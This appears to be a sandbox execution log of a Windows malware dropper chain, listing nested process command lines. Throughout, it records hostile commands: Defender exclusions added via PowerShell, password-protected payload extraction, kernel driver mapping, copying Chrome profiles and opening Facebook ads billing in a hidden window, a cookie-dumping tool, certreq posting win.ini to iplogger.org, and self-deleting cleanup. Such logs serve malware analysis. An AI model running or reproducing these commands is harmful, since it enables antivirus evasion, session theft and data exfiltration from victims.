C:\Users\Admin\AppData\Local\Temp\iv3m2ldjod0\app.exe"C:\Users\Admin\AppData\Local\Temp\iv3m2ldjod0\app.exe" /8-2323⤵PID:5092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Fragrant-Wave"24⤵PID:6540
-
-
C:\Program Files (x86)\Fragrant-Wave\7za.exe"C:\Program Files (x86)\Fragrant-Wave\7za.exe" e -p154.61.71.51 winamp-plugins.7z24⤵PID:6860
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Fragrant-Wave\app.exe" -map "C:\Program Files (x86)\Fragrant-Wave\WinmonProcessMonitor.sys""24⤵PID:10232
-
C:\Program Files (x86)\Fragrant-Wave\app.exe"C:\Program Files (x86)\Fragrant-Wave\app.exe" -map "C:\Program Files (x86)\Fragrant-Wave\WinmonProcessMonitor.sys"25⤵PID:3932
-
-
-
C:\Program Files (x86)\Fragrant-Wave\7za.exe"C:\Program Files (x86)\Fragrant-Wave\7za.exe" e -p154.61.71.51 winamp.7z24⤵PID:8604
-
-
C:\Program Files (x86)\Fragrant-Wave\app.exe"C:\Program Files (x86)\Fragrant-Wave\app.exe" /8-2324⤵PID:14972
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\Delta.exe" /Verysilent12⤵PID:9692
-
C:\Users\Admin\AppData\Local\Temp\is-1SA8K.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-1SA8K.tmp\Delta.tmp" /SL5="$20B08,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\Delta.exe" /Verysilent13⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\is-TI2FQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TI2FQ.tmp\Setup.exe" /VERYSILENT14⤵PID:9444
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-TI2FQ.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit15⤵PID:8628
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
PID:12876
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\zznote.exe" /Verysilent12⤵PID:6304
-
C:\Users\Admin\AppData\Local\Temp\is-5TRIQ.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-5TRIQ.tmp\zznote.tmp" /SL5="$30B08,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\zznote.exe" /Verysilent13⤵PID:7404
-
C:\Users\Admin\AppData\Local\Temp\is-IDOE3.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-IDOE3.tmp\jg4_4jaa.exe" /silent14⤵PID:9384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\hjjgaa.exe" /Verysilent12⤵PID:13588
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:14152
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:14268
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\l2dn5s0f4hf\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\l2dn5s0f4hf\askinstall24.exe"8⤵PID:3720
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:9864
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:9472
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y9⤵PID:7092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/9⤵PID:5212
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2010⤵PID:11592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,16710685466293105813,5629064577234757251,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1716 /prefetch:810⤵PID:3448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,16710685466293105813,5629064577234757251,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:210⤵PID:10172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\df5twoesp32\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\df5twoesp32\chashepro3.exe" /VERYSILENT8⤵PID:5472
-
C:\Users\Admin\AppData\Local\Temp\is-K4BLF.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-K4BLF.tmp\chashepro3.tmp" /SL5="$30906,1478410,58368,C:\Users\Admin\AppData\Local\Temp\df5twoesp32\chashepro3.exe" /VERYSILENT9⤵PID:12000
-
-
-
C:\Users\Admin\AppData\Local\Temp\xpvs5ooqtdg\xkcaojzju3g.exe"C:\Users\Admin\AppData\Local\Temp\xpvs5ooqtdg\xkcaojzju3g.exe" /ustwo INSTALL8⤵PID:10876
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "xkcaojzju3g.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xpvs5ooqtdg\xkcaojzju3g.exe" & exit9⤵PID:11068
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "xkcaojzju3g.exe" /f10⤵
- Kills process with taskkill
PID:9996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhfwlyy3mo5\app.exe"C:\Users\Admin\AppData\Local\Temp\jhfwlyy3mo5\app.exe" /8-238⤵PID:4476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dawn-Haze"9⤵PID:11424
-
-
C:\Program Files (x86)\Dawn-Haze\7za.exe"C:\Program Files (x86)\Dawn-Haze\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵PID:5416
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Dawn-Haze\app.exe" -map "C:\Program Files (x86)\Dawn-Haze\WinmonProcessMonitor.sys""9⤵PID:10560
-
C:\Program Files (x86)\Dawn-Haze\app.exe"C:\Program Files (x86)\Dawn-Haze\app.exe" -map "C:\Program Files (x86)\Dawn-Haze\WinmonProcessMonitor.sys"10⤵PID:11240
-
-
-
C:\Program Files (x86)\Dawn-Haze\7za.exe"C:\Program Files (x86)\Dawn-Haze\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:9572
-
-
C:\Program Files (x86)\Dawn-Haze\app.exe"C:\Program Files (x86)\Dawn-Haze\app.exe" /8-239⤵PID:14188
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4880 -
C:\Users\Admin\AppData\Roaming\E600.tmp.exe"C:\Users\Admin\AppData\Roaming\E600.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5096 -
C:\Users\Admin\AppData\Roaming\E600.tmp.exe"C:\Users\Admin\AppData\Roaming\E600.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1624
-
-
-
C:\Users\Admin\AppData\Roaming\E788.tmp.exe"C:\Users\Admin\AppData\Roaming\E788.tmp.exe"5⤵
- Executes dropped EXE
PID:4988 -
C:\Users\Admin\AppData\Roaming\E788.tmp.exe"{path}"6⤵PID:5264
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:4148
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:4100 -
C:\ProgramData\6972186.76"C:\ProgramData\6972186.76"5⤵PID:5464
-
-
C:\ProgramData\2459836.27"C:\ProgramData\2459836.27"5⤵PID:5484
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:4732
-
-
-
C:\ProgramData\7129350.78"C:\ProgramData\7129350.78"5⤵PID:5536
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:2228
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0063C75F2BCE726213E76B7F8EDFB4CA C2⤵
- Loads dropped DLL
PID:2780
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"1⤵PID:4388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"1⤵
- Drops file in System32 directory
PID:5088
-
C:\Program Files (x86)\JCleaner\Brava.exe"C:\Program Files (x86)\JCleaner\Brava.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5072
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"1⤵
- Executes dropped EXE
PID:3756 -
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"2⤵PID:6268
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:4208
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:5168
-
-
C:\Program Files (x86)\JCleaner\mex.exe"C:\Program Files (x86)\JCleaner\mex.exe"1⤵
- Executes dropped EXE
PID:2188 -
C:\Program Files (x86)\JCleaner\mex.exe"{path}"2⤵PID:6904
-
-
C:\Program Files (x86)\JCleaner\mex.exe"{path}"2⤵PID:6912
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\mex.exe"3⤵PID:8832
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:8928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-UQPOI.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-UQPOI.tmp\{app}\chrome_proxy.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4548 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-UQPOI.tmp\{app}\chrome_proxy.exe"2⤵PID:6840
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 43⤵
- Runs ping.exe
PID:6988
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.11⤵
- Runs ping.exe
PID:4780
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970391⤵PID:4332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"1⤵
- Drops file in System32 directory
PID:504
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"1⤵PID:4348
-
C:\Users\Admin\AppData\Local\Temp\is-BM0GT.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-BM0GT.tmp\vpn.tmp" /SL5="$1033E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\c0m2ttwc1ww\vpn.exe" /silent /subid=4821⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:5548
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:4756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:6396
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:6732
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:6416
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:8356
-
-
C:\Users\Admin\AppData\Local\Temp\is-4KKB0.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-4KKB0.tmp\IBInstaller_97039.tmp" /SL5="$102E0,14441882,721408,C:\Users\Admin\AppData\Local\Temp\cfngdyvq1yc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4936
-
C:\Users\Admin\AppData\Local\Temp\is-6F3LF.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-6F3LF.tmp\Setup.tmp" /SL5="$30466,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-OVAG0.tmp\Setup.exe" /Verysilent1⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\PictureLAb.exe" /Verysilent2⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\is-RT3LV.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-RT3LV.tmp\PictureLAb.tmp" /SL5="$10540,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\PictureLAb.exe" /Verysilent3⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\is-68SGK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-68SGK.tmp\Setup.exe" /VERYSILENT4⤵PID:6368
-
C:\Users\Admin\AppData\Local\Temp\is-QBSE1.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QBSE1.tmp\Setup.tmp" /SL5="$204C4,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-68SGK.tmp\Setup.exe" /VERYSILENT5⤵PID:6424
-
C:\Users\Admin\AppData\Local\Temp\is-JA54E.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-JA54E.tmp\def.exe" /S /UID=lab2146⤵PID:6684
-
C:\Program Files\Windows Media Player\KXVHIFUPNK\prolab.exe"C:\Program Files\Windows Media Player\KXVHIFUPNK\prolab.exe" /VERYSILENT7⤵PID:7016
-
C:\Users\Admin\AppData\Local\Temp\is-I7GDL.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-I7GDL.tmp\prolab.tmp" /SL5="$3025C,575243,216576,C:\Program Files\Windows Media Player\KXVHIFUPNK\prolab.exe" /VERYSILENT8⤵PID:7080
-
-
-
C:\Users\Admin\AppData\Local\Temp\07-d3eb1-c2d-30b8d-a99b19e084a0b\Baeluceruny.exe"C:\Users\Admin\AppData\Local\Temp\07-d3eb1-c2d-30b8d-a99b19e084a0b\Baeluceruny.exe"7⤵PID:7036
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tez400av.lvc\lod.exe & exit8⤵PID:7476
-
C:\Users\Admin\AppData\Local\Temp\tez400av.lvc\lod.exeC:\Users\Admin\AppData\Local\Temp\tez400av.lvc\lod.exe9⤵PID:8440
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ10⤵PID:8592
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt10⤵PID:8692
-
C:\Windows\SysWOW64\cmd.execmd11⤵PID:8856
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\trmmxqbk.oqy\customer4.exe & exit8⤵PID:8992
-
C:\Users\Admin\AppData\Local\Temp\trmmxqbk.oqy\customer4.exeC:\Users\Admin\AppData\Local\Temp\trmmxqbk.oqy\customer4.exe9⤵PID:9040
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"10⤵PID:9128
-
C:\Windows\regedit.exeregedit /s chrome.reg11⤵
- Runs .reg file with regedit
PID:8668
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe11⤵
- Kills process with taskkill
PID:8664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat11⤵PID:5208
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)12⤵PID:4788
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\chrome64.bat" h"13⤵PID:6036
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"14⤵PID:7220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:815⤵PID:7720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:215⤵PID:7712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:115⤵PID:7812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:115⤵PID:7804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:115⤵PID:7924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:115⤵PID:7944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:115⤵PID:7988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:115⤵PID:7980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4140 /prefetch:815⤵PID:8184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4000 /prefetch:815⤵PID:8176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4640 /prefetch:815⤵PID:6720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4452 /prefetch:815⤵PID:6412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4008 /prefetch:815⤵PID:7172
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings15⤵PID:4792
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6024f7740,0x7ff6024f7750,0x7ff6024f776016⤵PID:8336
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3288 /prefetch:815⤵PID:8644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4740 /prefetch:815⤵PID:6276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:815⤵PID:6284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1684 /prefetch:815⤵PID:7068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3872 /prefetch:815⤵PID:8664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:815⤵PID:7180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3764 /prefetch:815⤵PID:7244
-
-
